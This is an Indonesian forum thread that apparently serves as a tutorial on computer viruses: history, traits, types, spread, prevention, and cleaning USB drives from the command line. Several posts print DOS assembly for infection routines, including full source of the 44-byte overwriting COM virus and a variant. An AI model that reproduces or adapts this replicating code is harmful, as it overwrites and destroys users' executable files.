Tuts bahas virus & solusinya

Discussion in 'Programming & Reverse Engineering' started by comtrack, Mar 31, 2011.

  1. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    Permisi bos admin&momod mau bagi2 tuts. mengenai virus&solusi atasinya,mgkin ada gunanya,mohon bagi para master2 djawir bisa di share jg ilmu2nya perihal virus,utk bag. pertama kita mulai dgn pengertian virus komputer:

    [FONT=&quot].ASAL MUASAL VIRUS

    1949, John Von Neuman, menggungkapkan " teori self altering automata "
    yang merupakan hasil riset dari para ahli matematika.

    1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori
    yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori
    tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat
    program yang dapat memperbanyak dirinya dan dapat menghancurkan program
    buatan lawan.Program yang mampu bertahan dan menghancurkan semua program
    lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya
    menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka
    pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang
    diciptakan makin lama makin berbahaya, sehingga mereka melakukan
    pengawasan dan pengamanan yang ketat.

    1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini
    berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di
    dunia cyber.

    1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.

    source:ujie-cap.blog
    [/FONT]
     
  2. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    Lanjut bos tutsnya:

    PENGERTIAN VIRUS

    " A program that can infect other programs by modifying them to include
    a slighty altered copy of itself.A virus can spread throughout a computer
    system or network using the authorization of every user using it to
    infect their programs. Every programs that gets infected can also act as
    a virus that infection grows “
    ( Fred Cohen )

    Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di
    Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa
    persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).

    Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi
    memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu
    virus dibuat untuk menulari program-program lainnya, mengubah,
    memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini,
    virus hanya akan menulari apabila program pemicu atau program yang telah
    terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan
    ini tidak akan bahas worm karena nanti akan mengalihkan kita dari
    pembahasan mengenai virus ini.
     
  3. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    KRITERIA VIRUS

    Suatu program yang disebut virus baru dapat dikatakan adalah benar benar
    virus apabila minimal memiliki 5 kriteria :

    1. Kemampuan suatu virus untuk mendapatkan informasi
    2. Kemampuannya untuk memeriksa suatu program
    3. Kemampuannya untuk menggandakan diri dan menularkan
    4. Kemampuannya melakukan manipulasi
    5. Kemampuannya untuk menyembunyikan diri.

    Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap
    -tiap kemampuan itu dan mengapa ini sangat diperlukan.

    1.Kemampuan untuk mendapatkan informasi

    Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam
    suatu directory, untuk apa? agar dia dapat mengenali program program apa
    saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua
    file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan
    mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/
    data semua file, terus memilahnya dengan mencari file-file yang bisa
    ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi
    atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan
    pengumpulan data dan menaruhnya di RAM (biasanya :p ) , sehingga apabila
    komputer dimatikan semua data hilang tetapi akan tercipta setiap program
    bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .

    2.Kemampuan memeriksa suat program

    Suatu virus juga harus bias untuk memeriksa suatu program yang akan
    ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia
    harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,
    karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat
    berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan
    menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah
    memiliki/ memberi tanda pada file/program yang telah terinfeksi
    sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan
    adalah misalnya memberikan suatu byte yang unik disetiap file yang
    telah terinfeksi.

    3.Kemampuan untuk menggandakan diri

    Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus.
    Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari
    program lainnya. Suatu virus apabila telah menemukan calon korbannya
    (baik file atau program) maka ia akan mengenalinya dengan memeriksanya,
    jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari
    dengan cara menuliskan byte pengenal pada program/ file tersebut,dan
    seterusnya mengcopikan/menulis kode objek virus diatas file/program
    yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk
    menulari/ menggandakan dirinya adalah:

    a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian
    diciptakan suatu file menggunakan nama itu dengan menggunakan virus
    tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)
    b.Program virus yang sudah di eksekusi/load ke memori akan langsung
    menulari file-file lain dengan cara menumpangi seluruh file/program
    yang ada.

    4.Kemampuan mengadakan manipulasi

    Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus
    menulari suatu file/program. isi dari suatu rutin ini dapat beragam
    mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan
    untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini
    memanfaatkan kemampuan dari suatu sistem operasi (Operating System) ,
    sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem
    operasi. misal:

    a.Membuat gambar atau pesan pada monitor
    b.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari
    drive di pc
    c.Memanipulasi program/file yang ditulari
    d.Merusak program/file
    e.Mengacaukan kerja printer , dsb

    5.Kemampuan Menyembunyikan diri

    Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua
    pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.
    langkah langkah yang biasa dilakukan adalah:

    -Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan
    program lain yang dianggap berguna oleh pemakai.
    -Program virus diletakkan pada Boot Record atau track yang jarang
    diperhatikan oleh komputer itu sendiri
    -Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak
    berubah ukurannya
    -Virus tidak mengubah keterangan waktu suatu file
    -dll
     
  4. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    SIKLUS HIDUP VIRUS

    Siklus hidup virus secara umum, melalui 4 tahap:

    o Dormant phase ( Fase Istirahat/Tidur )
    Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi
    tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya
    program lain, dsb. Tidak semua virus melalui fase ini

    o Propagation phase ( Fase Penyebaran )
    Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau
    ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap
    program yang terinfeksi akan menjadi hasil “klonning” virus tersebut
    (tergantung cara virus tersebut menginfeksinya)

    o Trigerring phase ( Fase Aktif )
    Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa
    kondisi seperti pada Dormant phase

    o Execution phase ( Fase Eksekusi )
    Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya.
    Seperti menghapus file, menampilkan pesan-pesan, dsb
     
  5. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    .JENIS – JENIS VIRUS

    Untuk lebih mempertajam pengetahuan kita tentang virus, Aku akan coba
    memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran
    di dunia cyber.

    1.Virus Makro
    Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis
    dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
    pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
    aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada
    komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada
    komputer bersistem operasi Mac.
    contoh virus:

    -variant W97M, misal W97M.Panther
    panjang 1234 bytes,
    akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
    -WM.Twno.A;TW
    panjang 41984 bytes,
    akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya
    berekstensi *.DOT dan *.DOC
    -dll

    2.Virus Boot Sector
    Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan
    dirinya akan memindahkan atau menggantikan boot sector asli dengan program
    booting virus. Sehingga saat terjadi booting maka virus akan di load kememori
    dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar
    (ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar
    eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain
    selain drive c).
    contoh virus :

    -varian virus wyx
    ex: wyx.C(B) menginfeksi boot record dan floopy ;
    panjang :520 bytes;
    karakteristik : memory resident dan terenkripsi)
    -varian V-sign :
    menginfeksi : Master boot record ;
    panjang 520 bytes;
    karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
    -Stoned.june 4th/ bloody!:
    menginfeksi : Master boot record dan floopy;
    panjang 520 bytes;
    karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan
    pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali

    3.Stealth Virus
    Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
    dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendalikan
    instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
    baik secara penuh ataupun ukurannya .
    contoh virus:
    -Yankee.XPEH.4928,
    menginfeksi file *.COM dan *.EXE ;
    panjang 4298 bytes;
    karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
    -WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
    dimasukkan pula disini), menginfeksi floopy an motherboot record;
    panjang 520 bytes;
    menetap di memori; ukuran dan virus tersembunyi.
    -Vmem(s):
    menginfeksi file file *.EXE, *.SYS, dan *.COM ;
    panjang fie 3275 bytes;
    karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
    -dll

    4.Polymorphic Virus
    Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
    berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
    strukturnya setiap kali selesai menginfeksi file/program lain.

    contoh virus:

    -Necropolis A/B,
    menginfeksi file *.EXE dan *.COM;
    panjang file 1963 bytes;
    karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
    dapat berubah ubah struktur
    -Nightfall,
    menginfeksi file *.EXE;
    panjang file 4554 bytes;
    karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,
    terenkripsidan dapat berubah-ubah struktur
    -dll


    5.Virus File/Program
    Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
    baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi
    dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.


    6.Multi Partition Virus
    Virus ini merupakan gabungan dariVirus Boot sector dan Virus file: artinya
    pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-
    file *.EXE dan juga menginfeksi Boot Sector.
     
  6. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    BEBERAPA CARA PENYEBARAN VIRUS

    Virus layaknya virus biologi harus memiliki media untuk dapat menyebar,virus
    computer dapat menyebar keberbagai komputer/mesin lainnya juga melalui berbagai
    cara, diantaranya:

    1.Disket, media storage R/W
    Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk
    dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya.
    Media yang bias melakukan operasi R/W (read dan Write) sangat memungkinkan untuk
    ditumpangi virus dan dijadikan sebagai media penyebaran.

    2.Jaringan ( LAN, WAN,dsb)
    Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu
    virus ikut berpindah saat terjadi pertukaran/pengeksekusian file/program
    yang mengandung virus.

    3.WWW (internet)
    Sangat mungkin suatu situs sengaja di tanamkan suatu ‘virus’ yang akan
    menginfeksi komputer-komputer yang mengaksesnya.

    4.Software yang Freeware, Shareware atau bahkan *******
    Banyak sekali virus yang sengaja di tanamkan dalam suatu program yang di
    sebarluaskan baik secara gratis, atau trial version yang tentunya sudah
    tertanam virus didalamnya.

    5.Attachment pada Email, transferring file
    Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment
    dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk
    berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan
    seringkali memiliki ekstensi ganda pada penamaan filenya.
    :rock::rock:
     
  7. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    PENANGULANGANNYA

    1.Langkah-Langkah untuk Pencegahan
    Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :
    o Gunakan Antivirus yang anda percayai dengan updatean terbaru, tdak
    perduli appun merknya asalkan selalu di update, dan nyalakan Auto protect
    o Selalu men-scan semua media penyimpanan eksternal yang akan di gunakan,
    mungkin hal ini agak merepotkan tetapi jika Autoprotect anti virus anda
    bekerja maka prosedur ini dapat dilewatkan.
    o Jika Anda terhubung langsung ke Internet cobalah untuk mengkombinasikan
    Antivirus anda dengan Firewall, Anti spamming, dsb

    2.Langkah-Lagkah Apabila telah Terinfeksi

    o Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah disket,
    jaringan, email dsb, jika anda terhubung ke jaringan maka ada baiknya anda
    mengisolasi computer anda dulu (baik dengan melepas kabel atau mendisable
    dari control panel)
    o Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda,
    dengan cara:
    - Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb
    - Scan dengan antivirus anda, jika anda terkena saat Autoprotect berjalan
    berarti vius definition di computer anda tidak memiliki data virus ini,
    cobalah update secara manual atau mendownload virus definitionnya untuk
    anda install. Jika virus tersebut memblok usaha anda untuk mengupdatenya
    maka ,upayakan untuk menggunakan media lain (komputer) dengan antivirus
    updatean terbaru.
    o Bersihkan, setelah anda berhasil mendeteksi dan mengenalinya maka usahakan
    segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs
    -situs yang memberikan informasi perkembangan virus. Hal ini jika antivirus
    update-an terbaru anda tidak berhasil memusnahkannya.
    o Langkah terburuk, jika semua hal diatas tidak berhasil adalah memformat
    ulang komputer anda .
     
  8. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    . Cara Kerja Virus Komputer
    Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung dari DOS Command line .Sudah jadi sifat virus jika dia dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.
    Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah :
    1. Kemampuan mendapatkan informasi
    2. Kemampuan memeriksa program
    3. Kemampuan menggandakan diri / menularkan
    4. Kemampuan mengadakan manipulasi
    5. Kemampuan menyembunyikan diri sendiri
    Satu persatu kemampuan itu akan dijelaskan pada subbab selanjutnya

    2. Kemampuan mendapatkan Informasi
    Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting, terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :
    1. Apakah Extensi File tersebut ( COM,EXE, BAT)
    2. Apa Atribut file ( Hidden, Readonly, Archive)
    3. Besar File Yang akan Di infeksi

    Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus tersebut harus mencari file-file EXE yang akan ditulari.
    Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file dengan attribut Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut menjadi Normal, sehingga virus dapat menulari.
    Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa besar file yang sudah tertular, dimana Besar_file_terinfeksi = file_asli + Virus_size Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi tentang File :
    Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh
    Mov cx, 3 ; Attribut File ; cari host file
    ———
    int 21h ; Dos Intrupt
    cmp ax,12h ; Ada file lagi
    je exit ; kalau tidak ada exit
    ———
    file_to_infect db “*.COM” ; File yang akan diinfeksi
    ends start ; akhir kode Virus

    Listing 4.1. Search First File
    Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.
     
  9. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    3. Kemampuan Untuk Memeriksa Program
    Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File, selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer.

    Berikut ini contoh listing dari kemampuan untuk memeriksa file
    Mov ah, 3fh ; Baca file
    Mov cx, 3 ; baca 3 byte
    Mov dx,3_byte ; simpan pada buffer
    Add dx,si ; Nama file
    Int 21h ; Dos intrupt
    Cmp a,3 ; Cek 3 byte tadi
    Jnz cari_lagi ; Jika sudah tertular exit
    Jmp Infect ; kalau belum , infect_file
    3_byte equ $ ;data 3 byte pertama dari file asli
    ;yang belum tertular
    infect_file : ; bagian penginfeksian
    ———— ; rutin infeksi
    int 20h ; Dos Exit function
    nop ; No Operation
    4 . Periksa File
    Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban, umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows
    Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk menpercepat penularan. Rutin ini dipakai oleh 90 % virus komputer
     
  10. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    5. Kemampuan untuk menggandakan diri / Replicating
    kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending / NonOverwriting ), dan dapat berjalan sebagaimana mestinnya.
    Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.

    File bersih program Virus
    Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada bagian akhir dari file.

    Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di belakang file korban.
    Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :

    Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.
    Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya dalam program Com.
    Berikut ini listing dari 44-Virus.Asm :
    ________________________________________
    virus segment
    org 100h ; file COM
    assume cs:virus
    len equ offset last-100h ;Panjang virus = Akhir program – awal program
    start : mov ah,04eh ; Cari file dengan kategori file COM
    xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
    lea dx,com_mask ; Nama file COM masukan ke register DX
    int 21h ; Dos Intrupt
    open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
    mov dx,9eh
    Int 21h
    Infect : mov cx,len ; cx diisi panjang badan virus
    lea dx,start ; Masukan header Virus “V1″ pada DX
    Mov ah,40h ; Tulis badan virus dalam file korban
    Int 21h ; Dos Intrupt
    Next : mov ah,3eh ; Tutup file korban
    int 21h
    mov ah,4fh ; Cari file korban lagi
    int 21h
    jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
    ; Kalau sudah semua terinfeksi Exit
    com_mask: db “*.COM”,0 ; File dengan ekstensi Com
    last : db 090h ; Akhir badan virus “V2″
    virus ends
    end start
     
  11. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    6. Kemampuan Mengadakan Manipulasi
    Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :
    1. Menampilkan tulisan / kata-kata / gambar
    2. Membunyikan port speaker
    3. Time bomb / logic Bomb


    7. Menampilkan Tulisan / gambar
    Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program dibawah ini akan memberikan contoh pembuatan rutin ini.

    ________________________________________
    virus segment
    org 100h
    assume cs:virus
    len equ offset last-100h ; Panjang virus = Akhir program – awal program
    start : jmp mulai
    msg db ‘ Modification of 44 Virus ‘,13,10
    db ‘ © 2000,iwing[indovirus] ’,13,10
    db ‘ – For Educational Only -$’,13,10
    mulai : mov ah,09 ; Dos service 09h = Cetak String
    lea dx,msg ; dx berisi pesan yang akan dicetak
    int 21h ; Dos intrupt
    go : mov ah,04eh ; Cari file dengan kategori file COM
    xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
    lea dx,com_mask ; Nama file COM masukan ke register DX
    int 21h ; Dos Intrupt
    open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
    mov dx,9eh
    Int 21h
    infect : mov cx,len ; cx diisi panjang badan virus
    lea dx,start ; Masukan header Virus “V1″ pada DX
    mov ah,40h ; Tulis badan virus dalam file korban
    Int 21h ; Dos Intrupt
    Next : mov ah,3eh ; Tutup file korban
    int 21h
    mov ah,4fh ; Cari file korban lagi
    int 21h
    jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file
    ; Kalau sudah semua terinfeksi Exit
    com_mask: db “*.COM”,0 ; File dengan ekstensi Com
    last : int 20h ; Akhir badan virus “V2″
    virus ends
    end start

    Rutin Cetak String
    Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte
    Dengan tambahan rutin untuk menampilkan string :
    Modification of 44 Virus
    © 2000,iwing[indovirus]
    -For Educational Only –
    setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu
    mulai : mov ah,09 ; Dos service 09h = Cetak String
    lea dx,msg ; dx berisi pesan yang akan dicetak
    int 21h ; Dos intrupt

    Source: Bisnus Hacker
     
  12. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    lanjut lagi bos...:peace::peace:
    Hapus Virus di Flasdisk Lewat CMD
    Disini saya coba untuk menjelaskan sedikit cara menghapus virus yang ada di flashdisk melalui Command Prompt. Ini juga dari hasil penelusuran saya di halaman rumah om google dan menemukan beberapa forum yang membahas ini yang akhirnya saya satukan untuk bisa lebih jelas dan ringkas untuk dipahami. Sebenarnya sih untuk menghapus bisa aja menggunakan anti virus yang kebanyakan orang pake. Tapi ya sudahlah langsung aja kita bahas cara menghapus virus lewat CMD berikut..

    1. Colok Flash Ddisk yg terinfeksi.
    >> Pas nyolokin flash disk, langsung tekan+tahan tombol shift kiri untuk menonaktifkan fungsi autorun kira-kira 5 detik setelah itu lepasin tombolnya.

    2. lihat di my computer, flash disknya ada di mana ..misal di F:\

    3. start -> run -> ketik cmd

    4. masuk ke direktori flash disk misal direktori ada di F:\
    Anda tinggal mengetik "F:" (tanpa kutip)

    5. ketik "attrib" (tanpa kutip)

    6. biasanya virus di flash disk punya file yg namanya "autorun.inf" &
    biasanya attributnya system, hidden, read only (SHR)
    untuk melepas attribut itu anda ketik "attrib -s -h -r autorun.inf" (tanpa kutip)

    7. setelah attribut terlepas,, baru deh di hapus..
    "del autorun.inf" (tanpa kutip)

    8. Nah sekarang tinggal cari virusnya (yg ini kudu pake naluri,,
    karena masing-masing virus berbeda namanya.
    misal nama virusnya abc.exe

    9. Anda ikutin langkah no 6 tadi tapi autorun.inf nya di ganti dengan nama virus
    trus di hapus pake langkah no 7 (del namavirus.exe)

    Remove flash disk dan colokin lagi, kalau masih ada juga berarti komputer anda sudah dihuni oleh virus juga sebelum flash dick anda colokin.


    ALTERNATIF
    Selain menngunakan perintah "attrib" jg bisa menggunakan perintah "taskkill" yg gunanya untuk mematikan proses file, contoh pada kasus virus Kang.O pd tahun 2006 yg berjalan pada system.exe

    Klik [Start] [Run]
    Ketik [cmd]
    Matikan proses ”system.exe” dengan menggunakan perintah Taskkill dengan mengetikkan [taskkill /f /im system.exe], dan tekan enter

    source:ujie-cap
     
  13. comtrack

    comtrack New Member

    Messages:
    32
    Likes Received:
    3
    Trophy Points:
    0
    Membasmi Virus Menggunakan Command Windows
    .
    Saat komputer terjangkit virus, antivirus tentu menjadi jawaban yang paling tepat untuk menghilangkannya. Namun, tahukah Anda bahwa virus komputer juga bisa dilenyapkan tanpa menggunakan antivirus?

    Trik membersihkan virus tanpa antivirus ini bertujuan membasmi virus-virus baru dan virus lokal yang kebanyakan tidak dapat dideteksi oleh antivirus. Selain dapat mempersingkat waktu dalam men-scan virus, cara ini terbukti cukup ampuh bagi komputer yang sering terkena virus.

    Salah satu cara membersihkan virus tanpa antivirus adalah dengan menggunakan Command Windows. Berikut adalah prosesnya.

    1. Matikan virus di memori. Gunakan tools task manager, proses explore untuk menghentikan loading virus ke memori. Cari yang aktivitasnya memakan banyak memori dan resource CPU tinggi, kemudian [Kill Proses].
